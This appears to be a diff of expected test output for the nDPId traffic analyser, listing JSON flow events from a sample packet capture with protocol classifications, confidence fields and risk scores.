+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408457,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":180000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":180000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104383810,"flow_last_seen":1470104413817,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104382448,"flow_last_seen":1470104427503,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104424738,"flow_last_seen":1470104426276,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104393610,"flow_last_seen":1470104394635,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104391564,"flow_last_seen":1470104422179,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":650,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1470104378021,"flow_last_seen":1470104379520,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104393610,"flow_last_seen":1470104393611,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104383810,"flow_last_seen":1470104413817,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104382448,"flow_last_seen":1470104427503,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104424738,"flow_last_seen":1470104426276,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104393610,"flow_last_seen":1470104394635,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104391564,"flow_last_seen":1470104422179,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":650,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1470104378021,"flow_last_seen":1470104379520,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104393610,"flow_last_seen":1470104393611,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
